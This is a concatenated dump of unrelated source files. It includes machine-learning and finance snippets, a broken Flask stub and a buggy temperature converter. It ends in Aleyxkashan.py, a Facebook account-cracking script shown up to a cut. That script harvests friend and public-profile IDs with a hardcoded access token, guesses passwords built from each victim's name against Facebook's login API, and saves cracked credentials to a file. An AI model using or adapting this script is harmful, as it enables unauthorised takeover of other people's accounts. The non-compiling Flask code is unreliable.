display('Worker_' + model_type + ' %s is running...' %user_name, logger, verbose)
wn.run()
display('Worker_' + model_type + ' %s: EXIT' %user_name, logger, verbose)
# Retrieving and saving the trained model
display('Retrieving the trained model from WorkerNode', logger, verbose)
model = wn.get_model()
# Warning: this save_model utility is only for demo purposes
output_filename_model = './results/models/Worker_' + str(user_name) + '_' + dataset_name + '_model'
model.save(output_filename_model)
# Making predictions on test data
display('------------- Obtaining predictions------------------------------------\n', logger, verbose)
preprocessors = wn.get_preprocessors()
if preprocessors is not None:
for prep_model in preprocessors: # Apply stored preprocessor sequentially (in the same order received)
Xtst = prep_model.transform(Xtst)
display('Test data transformed using %s' %prep_model.name, logger, verbose)
preds_tst = model.predict(Xtst)
preds_tst = np.argmax(preds_tst, axis=-1) # Convert to labels
y = np.argmax(ytst, axis=-1) # Convert to labels
classes = np.arange(ytst.shape[1]) # 0 to 9
# Evaluating the results
display('------------- Evaluating --------------------------------------------\n', logger, verbose)
# Warning, these evaluation methods are not part of the MMLL library, they are only intended
# to be used for the demos. Use them at your own risk.
output_filename = 'Worker_' + str(user_name) + '_NN_confusion_matrix_' + dataset_name + '.png'
title = 'NN confusion matrix in test set worker'
plot_cm_seaborn(preds_tst, y, classes, title, output_filename, logger, verbose, normalize=True)
# Load Tf SavedModel and check results
model_loaded = tf.keras.models.load_model(output_filename_model)
preds_tst = model_loaded.predict(Xtst)
preds_tst = np.argmax(preds_tst, axis=-1) # Convert to labels
# Model export to ONXX
output_filename_model = './results/models/Worker_' + str(user_name) + '_' + dataset_name + '_model.onnx'
model.save(output_filename_model)
# Compute the prediction with ONNX Runtime
onnx_session = onnxruntime.InferenceSession(output_filename_model)
onnx_inputs = {onnx_session.get_inputs()[0].name: Xtst}
onnx_output = onnx_session.run(None, onnx_inputs)[0]
onnx_output = np.argmax(onnx_output, axis=-1) # Convert to labels
err_onnx = accuracy_score(y,onnx_output)
display('Test accuracy in ONNX model is %f' %err_onnx, logger, verbose)
|
[
"[email protected]"
] | |
769544d72d4133cfda273b9299d86d755a66af8d
|
ed0ae2e865211ef932b519ece7f243134b34dd6b
|
/etl/views.py
|
d349ce6a1bac41385d163051d2a4936e9b04beaf
|
[
"MIT"
] |
permissive
|
vahana/etl
|
f21c2674bfa17c30a7492260841160f689539dd4
|
d76e6f975850dc286a22ba2afb22416a6b35cf33
|
refs/heads/master
| 2023-03-10T08:34:58.752529 | 2021-02-23T21:00:28 | 2021-02-23T21:00:28 | 270,042,567 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 182 |
py
|
import logging
import prf
from jobs.views import BaseJobView
from jobs.etl import ETLJob
log = logging.getLogger(__name__)
class ETLJobView(BaseJobView):
_job_class = ETLJob
|
[
"[email protected]"
] | |
322d4d98c58a100b1d7db231f1dbea4fe7ad8180
|
0a47474366d60323c683b83e2224d409701b9e34
|
/core.py
|
a7d8208fb94b70790fe825b246543ae03cc235d1
|
[] |
no_license
|
AdriCabSan/VisionBoard-API
|
77b74a01109ca6f83fb53066f5c62e6ffb1f67bf
|
f43336b1e19b5b4512fae2897bf184235bec5ef5
|
refs/heads/master
| 2020-06-18T19:57:24.695954 | 2019-07-12T17:16:17 | 2019-07-12T17:16:17 | 196,427,521 | 0 | 0 | null | 2019-07-12T14:33:29 | 2019-07-11T16:12:06 |
Python
|
UTF-8
|
Python
| false | false | 1,122 |
py
|
from flask import Flask
from datetime import datetime
from Slack import SlackMessenger
from Trello import VisionTrello
app = Flask(__name__)
@app.route("/")
def home():
return "Hello, Flask!"
@app.route("card/")
def getPointsOfCard(card_name, open_character, closed_character):
return VisionTrello.get_points_of_a_card(card_name,open_character,closed_character)
#This will show you the percentage of recommendation for each person in the board to make some cards based on their experience with the card labels that they did
@app.route("/card/<point>")
def showingRecommendations(board):
#This will show you a recommended card for a given member id within the limit based on your experience working with other card
@app.route("/card/<member>")
def recomendCardToMember(board):
@app.route("/card/<point>")
def respectColumnRules(board):
@app.route("/card/<point>")
def getPointsOfColumn(board):
return ret
@app.route("card/<point>")
def get(board, column_name):
return ret
@app.route("card/<point>")
def getMemberId(member_name):
@app.route("/sprint/<point>")
def predictSprintPoints(board):
|
[
"[email protected]"
] | |
c54ee5782b49ba10185b84a0833b690133e6e82f
|
e6647877270c955ddd6fe6318cc9763b9e531615
|
/F2C.py
|
285121d8fb3df547694a36425517e2f4ad1cf121
|
[] |
no_license
|
Atticakes/Portfolio
|
a4dbfad79203e808c5fa7fab412d22843254d183
|
8115eb9661556dac5026715f2bdc6a5e9e262d23
|
refs/heads/master
| 2021-01-13T00:55:46.609781 | 2016-03-21T01:46:06 | 2016-03-21T01:46:06 | 52,247,800 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 389 |
py
|
#T(°C) = (T(°F) - 32) × 5/9
print "Hello, I am a temperature converter."
fahrenheit = int(raw_input("Please provide me with the Fahrenheit reading:"))
print "Thank you!"
print "I will not do some maths to convert",fahrenheit,"to Celsius."
print "Celsius =",fahrenheit,"- 32) x 5/9"
celsius = (fahrenheit - 32) * (5/9)
print fahrenheit,"degrees Fahrenheit =",celsius,"degrees Celsius!"
|
[
"[email protected]"
] | |
f39ddf34b551cffbf5f5682a315080605920917c
|
baad77465c6470247b6a00736aed1442ae084249
|
/ui/constants.py
|
7d581348506bb09a22422a2a348794773972adfd
|
[
"MIT"
] |
permissive
|
yiluzhu/arbi
|
03d5d3bbc32bb7def7e9ae84ff174677fd371cf6
|
5b141e981547341dcb32e730f058da567731ebed
|
refs/heads/master
| 2020-03-11T05:15:13.999035 | 2018-04-16T20:14:53 | 2018-04-16T20:14:53 | 129,797,314 | 4 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 40 |
py
|
ENGINE_INSPECTOR_UI_REFRESH_INVERVAL = 5
|
[
"[email protected]"
] | |
59e0a98241e7bc62282bfca078e754e048389113
|
5b5efaaa9ca73cd67dc032c654f8aa402ebb9cc7
|
/jhu-code/Cryptology/merklehellman.py
|
0f22a0b78d3b9053e0a8a8819604c33c97fb01a9
|
[] |
no_license
|
shellsharks/assorted
|
5fa00cbfac49bcf3db3f15f622ce68ded615993f
|
d20a3d2069837c18e1da9ac013eaad1f1744c316
|
refs/heads/master
| 2022-09-17T11:48:36.233633 | 2022-08-15T14:11:58 | 2022-08-15T14:11:58 | 190,086,937 | 6 | 3 | null | 2023-07-27T21:30:38 | 2019-06-03T21:47:20 |
Java
|
UTF-8
|
Python
| false | false | 765 |
py
|
M = 2647
W = 1036
ciphertext = [6368,7879,2050,1745,2714,3439,4007,4680,4246,2450,7501]
A = [3,5,11,20,41,83,165,329,662,1321]
'''
B = []
def calcB(a):
for x in a:
B.append((W*x)%M)
calcB(A)
print(B)
'''
def modInverse(a, m) :
a = a % m;
for x in range(1, m) :
if ((a * x) % m == 1) :
return x
return 1
def decrypt(c):
b = (c * modInverse(W,M))%M
i = 0
binrep = ""
for x in A[::-1]:
if (x+i) <= b:
i = i + x
binrep = binrep + "1"
else:
binrep = binrep + "0"
binrep=binrep[::-1]
return int(binrep, base=2)
def digraph(num):
return [chr(int((num-(num%26))/26)+65),chr(num%26+65)]
for x in ciphertext: print(digraph(decrypt(x)))
print(modInverse(W,M))
|
[
"[email protected]"
] | |
d81e5b4cac4a3d420bf1a4c78a385832a70ea509
|
c7691adc85632e20c8bd0c7f031e5cfde34f2456
|
/Carry/mysite/sub_client.py
|
6da519ef9f1f1a619c0b4e0db35136662d86e22e
|
[] |
no_license
|
hunaghaikong/CodeAll
|
3bd112d4299d8b14d4e41512791c82c7febeadf4
|
818ae04b6f2ca00495c73fd9b3810f083aa3339e
|
refs/heads/master
| 2020-05-16T17:19:45.707554 | 2019-04-24T09:18:18 | 2019-04-24T09:18:18 | 183,191,783 | 0 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,195 |
py
|
import zmq
from zmq import Context
from datetime import datetime
from threading import Thread
from mysite import HSD
tcp=HSD.get_tcp() # IP地址
poller = zmq.Poller()
ctx1 = Context()
ticker_sub_socket = ctx1.socket(zmq.SUB)
ticker_sub_socket.connect('tcp://{}:6868'.format(tcp))
ticker_sub_socket.setsockopt_unicode(zmq.SUBSCRIBE, '')
poller.register(ticker_sub_socket, zmq.POLLIN)
ticker_sub_socket.setsockopt_unicode(zmq.SUBSCRIBE, '')
poller.register(ticker_sub_socket, zmq.POLLIN)
ctx3 = Context()
req_price_socket = ctx3.socket(zmq.REQ)
req_price_socket.connect('tcp://{}:6870'.format(tcp))
ctx4 = Context()
handle_socket = ctx4.socket(zmq.REQ)
handle_socket.connect('tcp://{}:6666'.format(tcp)) #237
class sub_ticker:
def __init__(self, prodcode):
self._prodcode = prodcode
self._is_active = False
self._is_sub = False
def _run(self, func):
while self._is_active:
ticker = ticker_sub_socket.recv_pyobj()
print(ticker)
if ticker.ProdCode.decode() == self._prodcode:
func(ticker)
def __call__(self, func):
self._func = func
return self
def start(self):
if self._is_active == False:
self._is_active = True
self._thread = Thread(target=self._run, args=(self._func,))
self._thread.setDaemon(True)
self._thread.start()
def stop(self):
self._is_active = False
# self._thread.join()
def sub(self):
self.handle_socket.send_multipart([b'sub_ticker', self._prodcode.encode()])
self._is_sub = True
print(handle_socket.recv_string())
def unsub(self):
handle_socket.send_multipart([b'unsub_ticker', self._prodcode.encode()])
self._is_sub = False
print(handle_socket.recv_string())
def getTickData():
global ticker_sub_socket
#return ticker_sub_socket
while True:
try:
ticker = ticker_sub_socket.recv_pyobj()
yield ticker#.TickerTime,ticker.Price,ticker.Qty
except Exception as exc:
print(exc)
if __name__ == '__main__':
for i,j,k in getTickData():
print(i,j,k)
|
[
"[email protected]"
] | |
529e64afce996323c0964b1bbdce4a74e5087754
|
cbe75aea42763c465cc5d1e6ca8ed95889fead79
|
/Aleyxkashan.py
|
391b86688cc00535cc186fd29cab27899f0b837c
|
[] |
no_license
|
aleykashanbrand/aleyxkashan
|
bc9428e10f1f0dfe481f98b5a860ca3d3ddc1eba
|
4e3648e3ea89718f307d0d9343a83a67db6c2d4e
|
refs/heads/main
| 2023-06-15T15:32:23.236165 | 2021-07-06T07:19:59 | 2021-07-06T07:19:59 | 383,375,448 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 28,406 |
py
|
#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.001)
def tokenz():
os.system('clear')
print logo
toket = raw_input("\033[1;91m[?] \033[1;97mToken\033[1;91m : \033[1;95mCopy👉 \033[1;92mEAAAAUaZA8jlABAEZBmW0yH8w0R2XhpqqNiaQvKDkm1wCFazEcrJEzJThJrjZC3fuBFP6DFNmNnZB8ueUyVZCH7zPMulcTHZBa9ZCRHTTRTc0wneLqx5BZBruQbJQAx5pssqNnZB9qH6oHFjqWJf0yoOFkawm7hDqVYM8wCALx4xv7hi4ERoBPpgSGKAsm95Xt8fcZD \033[1;96m👈 Without fb ID free login Copy Paste & Enter👉\033[1;92m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
Name = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
menu()
except KeyError:
print "\033[1;91m[!] Wrong"
e = raw_input("\033[1;91m[?] \033[1;92mWant to pick up token?\033[1;97m[y/n]: ")
if e =="":
keluar()
elif e =="y":
login()
else:
keluar()
#### LOGO ####
logo = """
\033[1;94m
\033[1;91m ╔═══╗ ╔╗─╔╗ \t
\033[1;92m ║╔═╗ ║─║║ \n
\033[1;93m ║║─║║ ║╚═╝ \n
\033[1;94m ║╚═╝║ ║╔═╗║ \t
\033[1;95m ║╔═╗║ A L E Y \n
\033[1;97m ╚╝─╚╝ ╚╝─╚╚ \t
7.8.6
\033[1;31m\033[1;31m╔══════════════════════════════════════════════════╗
\033[1;31m\033[1;31m║\033[0;33m\033[1;33m* AUTHOR : \033[1;39mCREATOR ALEY KASHAN \033[1;31m║
\033[1;31m\033[1;31m║\033[0;33m\033[1;33m* FACEBOOK: \https://www.facebook.com/profile.php?id=100022645551442 \033[1;31m║
\033[1;31m\033[1;31m║\033[0;33m\033[1;33m* GITHUB : \033[1;39mhttps://Github.com/aleykashanbrand \033[1;31m║
\033[1;31m\033[1;31m╚══════════════════════════════════════════════════╝"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mLoging In \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print "\033[1;96m•◈•───────────────•◈•\033[1;92mBALOCH \033[1;96m•◈•───────────────•◈•"
print """
\033[1;91m╔══╗─╔═══╗╔╗
\033[1;92m║╔╗║─║╔═╗║║║
\033[1;93m║╚╝╚╗║║─║║║║
\033[1;94m║╔═╗║║╚═╝║║║─╔╗
\033[1;95m║╚═╝║║╔═╗║║╚═╝║
\033[1;97m╚═══╝╚╝─╚╝╚═══╝
"""
print "\033[1;96m•◈•───────────────•◈•\033[1;92mALEY*KASHAN\033[1;96m•◈•───────────────•◈•"
jalan(" \033[1;93m┳┻┳┻▇▇▇▇▇▇ ╭━━━━╮╱▔▔▔╲ ▇▇▇▇▇▇┳┻┳┻┳┻")
jalan(" \033[1;93m┻┳┻┳▇▇▇▇▇▇ ┃╯╯╭━┫▏╰╰╰▕ ▇▇▇▇▇▇┻┳┻┳┻┳")
jalan(" \033[1;93m┳┻┳┻▇▇▇▇▇▇ ┃╯╯┃▔╰┓▔▂▔▕╮ ▇▇▇▇▇▇┳┻┳┻┳┻")
jalan(" \033[1;93m┻┳┻┳▇▇▇▇▇▇ ╰╮╯┃┈╰┫╰━╯┏╯ ▇▇▇▇▇▇┻┳┻┳┻┳")
jalan(" \033[1;93m┳┻┳┻▇▇▇▇▇▇ ┏╯╯┃╭━╯┳━┳╯ ▇▇▇▇▇▇┻┳┻┳┻┳")
jalan(" \033[1;93m┻┳┻┳▇▇▇▇▇▇ ╰━┳╯▔╲╱▔╭╮▔╲ ▇▇▇▇▇▇┳┻┳┻┳┻")
jalan(" \033[1;93m┳┻┳┻▇▇▇▇▇▇ ┃┈╲┈╲╱╭╯╮▕ ▇▇▇▇▇▇┻┳┻┳┻┳")
jalan(" \033[1;93m┻┳┻┳▇▇▇▇▇▇ ┃┈▕╲▂╱┈╭╯╱ ▇▇▇▇▇▇┳┻┳┻┳┻")
jalan(" \033[1;93m┳┻┳┻▇▇▇▇▇▇ ┃'''┈┃┈┃┈''' ▇▇▇▇▇▇┻┳┻┳┻┳")
jalan(" \033[1;93m┻┳┻┳▇▇▇▇▇▇ ┏╯▔'''╰┓┣━┳┫ ▇▇▇▇▇▇┳┻┳┻┳┻")
jalan(" \033[1;93m ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇")
jalan(" \033[1;93m▇▇\033[1;95m WellCome to ALEY HACKER \033[1;93m▇▇")
jalan(" \033[1;93m▇▇\033[1;91m 👇 AUTHOR 👇 \033[1;93m▇▇")
jalan(" \033[1;93m▇▇\033[1;92m This Tools Is Created By \033[1;93m▇▇")
jalan(" \033[1;93m▇▇\033[1;92m ALEY KASHAN \033[1;93m▇▇")
jalan(" \033[1;93m▇▇\033[1;92m WHATTSAPP: 03554576001 \033[1;93m▇▇")
jalan(" \033[1;93m ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇")
CorrectUsername = "Aleyxkashan"
CorrectPassword = "786"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \033[1;91mUSERNAME \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \033[1;91mPASSWORD \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:ALEY
loop = 'false'
else:
print "Serious Please"
os.system('xdg-open https://www.facebook.com/MOHSIN.ALI.ALL.HATERX.KA.PAPA.FEEL.THE.POWER')
else:
print "Wrong Dear!"
os.system('xdg-open https://www.facebook.com/FATIMA.ALI.THE.BRAND')
####login#########
def login():
os.system('clear')
print logo
print "\033[1;93m-•◈•-\033[1;91m> \033[1;92m1.\x1b[1;96m Login With Facebook "
time.sleep(0.05)
print "\033[1;93m-•◈•-\033[1;91m> \033[1;92m2.\x1b[1;95m Login With Token"
time.sleep(0.05)
print "\033[1;93m-•◈•-\033[1;91m> \033[1;92m3.\x1b[1;93m CONTECT ME ON FACEBOOK "
time.sleep(0.05)
print "\033[1;93m-•◈•-\033[1;91m> \033[1;92m0.\033[1;91m Exit "
pilih_login()
def pilih_login():
peak = raw_input("\n\033[1;96mChoose an Option>>> \033[1;95m")
if peak =="":
print "\x1b[1;91mFill in correctly"
pilih_login()
elif peak =="1":
login1()
elif peak =="2":
tokenz()
elif peak =="3":
os.system('xdg-open https://www.facebook.com/BALOCH.EDITX')
login()
elif peak =="0":
keluar()
else:
print"\033[1;91m[!] Wrong input"
keluar()
def login1():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
time.sleep(0.05)
print logo
jalan("\033[1;91mWarning \033[1;92mDo Not Use Your Personal Account")
jalan("\033[1;91mWarning \033[1;92mUse a New Account To Login")
print('\033[1;97m\x1b[1;96m................LOGIN WITH FACEBOOK................\x1b[1;97m' )
print(' ' )
id = raw_input('\033[1;97m[] \x1b[1;93mFacebook/Email\x1b[1;93m: \x1b[1;93m')
pwd = raw_input('\033[1;97m[] \x1b[1;93mPassword \x1b[1;93m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\x1b[1;97mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\x1b[1;95mLogin Successful.•◈•..'
os.system('xdg-open https://www.facebook.com/BALOCH EDITX')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\x1b[1;97mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\x1b[1;97mYour Account is on Checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\x1b[1;93mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\x1b[1;94mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
o = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(o.text)
Name = a['name']
id = a['id']
t = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(t.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print"\033[1;97mYour Account is on Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\x1b[1;94mThere is no internet connection"
keluar()
os.system("clear") #Dev:Baloch
time.sleep(0.05)
print logo
print "\033[1;96m•◈•───────────────•◈•\033[1;92mAZHAR*BALOCH\033[1;96m•◈•───────────────•◈•"
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Name \033[1;91m: \033[1;97m"+Name+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;97m"+id+"\x1b[1;97m "
print "\033[1;96m•◈•───────────────•◈•\033[1;92mALEY*KASHAN\033[1;96m•◈•───────────────•◈•"
print "\x1b[1;96m[\x1b[1;93m1\x1b[1;96m]\x1b[1;93m Hack Facebook Account"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Logout "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mFill In Correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="0":
jalan('Remove The Token')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mFill In Correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print "\033[1;96m•◈•───────────────•◈•\033[1;92mALEY*KASHAN\033[1;96m•◈•───────────────•◈•"
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m] \033[1;93mHACK WITH FRIEND LIST"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m] \033[1;93mHACK WITH PUBLIC ID"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m] \033[1;93mHACK WITH FILE"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m] \033[1;91mBack"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mFill In Correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print "\033[1;96m•◈•───────────────•◈•\033[1;92mAZHAR*BALOCH\033[1;96m•◈•───────────────•◈•"
jalan('\033[1;96m[✺] \033[1;93mSearching ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print "\033[1;96m•◈•───────────────•◈•\033[1;92mALEY*KASHAN\033[1;96m•◈•───────────────•◈•"
idt = raw_input("\033[1;96m[+] \033[1;37mEnter ID Code \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mFriend Name\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mFriend List Public Nahi Hain!"
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mSearching ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print "\033[1;96m•◈•───────────────•◈•\033[1;92mFATIMA*ALI\033[1;96m•◈•───────────────•◈•"
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mInput Name file \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile Nai Milli'
raw_input('\n\x1b[1;96m[ \x1b[1;97mBack \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mFill In Correctly"
pilih_super()
print "\033[1;96m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
time.sleep(0.05)
jalan('\033[1;96m[✺] \033[1;92mStart \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;92mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
time.sleep(0.05)
print
print('\x1b[1;96m[!] \033[1;92mStop CTRL+z')
time.sleep(0.05)
print "\033[1;96m•◈•───────────────•◈•\033[1;92mAZHAR*BALOCH\033[1;96m•◈•───────────────•◈•"
print ('\033[1;96m[\033[1;92mO\033[1;93mR\033[1;96m] \033[1;93m User ID \033[1;96m| \033[1;93mPassword \033[1;96m - \033[1;93m ID Name')
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1 + ' - ' + b['name']
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['last_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2 + ' - ' + b['name']
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name']+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3 + ' - ' + b['name']
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = b['last_name']+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4 + ' - ' + b['name']
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['first_name']+'1122'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
